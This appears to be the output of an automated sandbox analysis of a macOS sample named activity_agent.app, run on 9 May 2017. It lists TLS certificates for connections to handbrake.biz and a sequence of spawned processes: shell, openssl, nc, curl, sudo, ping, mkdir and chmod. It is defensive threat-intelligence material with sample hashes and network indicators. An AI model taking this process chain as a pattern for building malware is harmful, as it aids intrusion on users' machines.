Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A 
.Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SETue May 30 12:48:38 CEST 2000Sat May 30 12:48:38 CEST 2020[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 
eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 
.A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o]
Mai 9, 2017 16:26:37.713063955 MESZ4434929785.17.25.66192.168.0.50CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control ValidatedCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Apr 29 02:00:00 CEST 2017Mon Apr 30 01:59:59 CEST 2018[[ Version: V3 Subject: CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 24378134875974158951713261952361346902965564853853505420709545282913265130671990526215297517581546808352604556784984894379733245204507279455518802540831459428078206963637731026331844246308870542162153927757747056637243618612820381081898800832982050988869190643889465082353297039648391405706140399448202019269282701086715969276105497720600650656643681863997206736777688269358957502616446454522452663141852488132309222307609841248799351748789688873721558439452678892112647169736732697174195045318432052386534891979570787328324086387950784903292078233911925501258007940725200306989938031943982559427544145827309616152039 public exponent: 65537 Validity: [From: Sat Apr 29 02:00:00 CEST 2017, To: Mon Apr 30 01:59:59 CEST 2018] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 8438ece5 76cefb5b b02efbb8 de304215]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ 
[DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: handbrake.biz DNSName: www.handbrake.biz][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 26 94 AF DF B9 9F 98 08 DF 3E 0D E0 FC F2 05 2A &........>.....*0010: CD A8 57 75 ..Wu]]] Algorithm: [SHA256withRSA] Signature:0000: 0B 08 8B D7 52 6A DA 45 53 99 5C AD 7E EB 01 25 ....Rj.ES.\....%0010: B7 7A FC 47 02 B4 DB BD 82 C8 F0 E2 5E 10 57 0D .z.G........^.W.0020: AE 94 DD 2A 8B 7C EC 49 4C DF C4 C9 13 5E DA B9 ...*...IL....^..0030: F1 86 EA 32 95 71 9F 67 4F 05 6F A6 B5 EC 3E 8E ...2.q.gO.o...>.0040: 55 FB 26 01 31 0A 1E 61 68 34 31 97 CE 1B 1A E7 U.&.1..ah41.....0050: DC 9B 44 3D 93 40 76 C1 6F EB 36 59 2A CF 34 16 ..D=.@v.o.6Y*.4.0060: E1 82 4C 7F 81 E3 60 22 77 0D 36 97 34 C8 22 A8 ..L...`"w.6.4.".0070: 46 30 01 BE F9 3B DF 1E 6E 97 63 34 B3 6D 8D 25 F0...;..n.c4.m.%0080: 92 EC 11 4C A5 36 0C ED 2B FC 4E 68 1B F2 F7 9C ...L.6..+.Nh....0090: 6B 85 44 88 EE 85 85 74 FC E5 85 3E D7 E9 4C 4D k.D....t...>..LM00A0: BD CC 17 EB 92 4E 71 81 26 A3 E3 40 B7 11 54 5C .....Nq.&..@..T\00B0: 12 D4 1A 7C 3E DE 93 39 55 69 7F 75 1C 45 4F 70 ....>..9Ui.u.EOp00C0: 9E FD 07 A7 80 C8 E1 67 E6 42 4F 1C 3E 5E D2 E8 .......g.BO.>^..00D0: D1 C0 50 79 66 A4 E1 15 98 5E 8D 1B 5B 58 C2 73 ..Pyf....^..[X.s00E0: 83 D0 8A 67 C9 B2 A4 D7 9E B5 D2 AF 97 2E A9 22 
...g..........."00F0: 1D E2 91 88 2D DD 5C EB F6 DF F0 6B 31 5F E3 64 ....-.\....k1_.d]
Mai 9, 2017 16:26:37.713063955 MESZ4434929785.17.25.66192.168.0.50CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 
Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A 
.Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Mai 9, 2017 16:26:37.713063955 MESZ | 443 | 49297 | 85.17.25.66 | 192.168.0.50 | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | Tue May 30 12:48:38 CEST 2000 | Sat May 30 12:48:38 CEST 2020

System Behavior

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/libexec/xpcproxy
File size:42656 bytes
MD5 hash:d68b4c6f2056c73e1d3bd228bcd6d4ff

General

Start time:16:25:39
Start date:09/05/2017
Path:/Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent
File size:468572 bytes
MD5 hash:6a2d0c8b20efc3fa283176a4bc76d6fd

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/bin/openssl
File size:922496 bytes
MD5 hash:1689d18d1f1b7b07480d337cc7fc9f43

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/bin/nc
File size:42400 bytes
MD5 hash:2cbc307230ad7cd8050109ea4f2bd078

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/bin/curl
File size:172016 bytes
MD5 hash:313ae871e04221163541c8af134351dc

General

Start time:16:25:44
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/usr/bin/sudo
File size:168448 bytes
MD5 hash:7d986f7707c0f11264989cd7105ea80d

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/usr/bin/sudo
File size:168448 bytes
MD5 hash:7d986f7707c0f11264989cd7105ea80d

General

Start time:16:25:46
Start date:09/05/2017
Path:/usr/bin/sudo
File size:168448 bytes
MD5 hash:7d986f7707c0f11264989cd7105ea80d

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/echo
File size:18032 bytes
MD5 hash:28aaba1826ce568b1eec9cf71ad0655c

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:47
Start date:09/05/2017
Path:/usr/bin/curl
File size:172016 bytes
MD5 hash:313ae871e04221163541c8af134351dc

General

Start time:16:25:48
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:48
Start date:09/05/2017
Path:/usr/bin/openssl
File size:922496 bytes
MD5 hash:1689d18d1f1b7b07480d337cc7fc9f43

General

Start time:16:25:48
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:48
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:48
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:25:59
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:59
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:59
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:11
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:11
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:11
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:13
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:13
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:13
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:14
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:14
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:14
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:15
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:15
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:15
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:16
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:16
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:16
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:17
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:17
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:17
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:23
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:23
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:23
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:29
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:29
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:29
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:30
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:30
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:30
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mkdir
File size:18496 bytes
MD5 hash:00efa095a9110a312bf9115afb361764

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/chmod
File size:33904 bytes
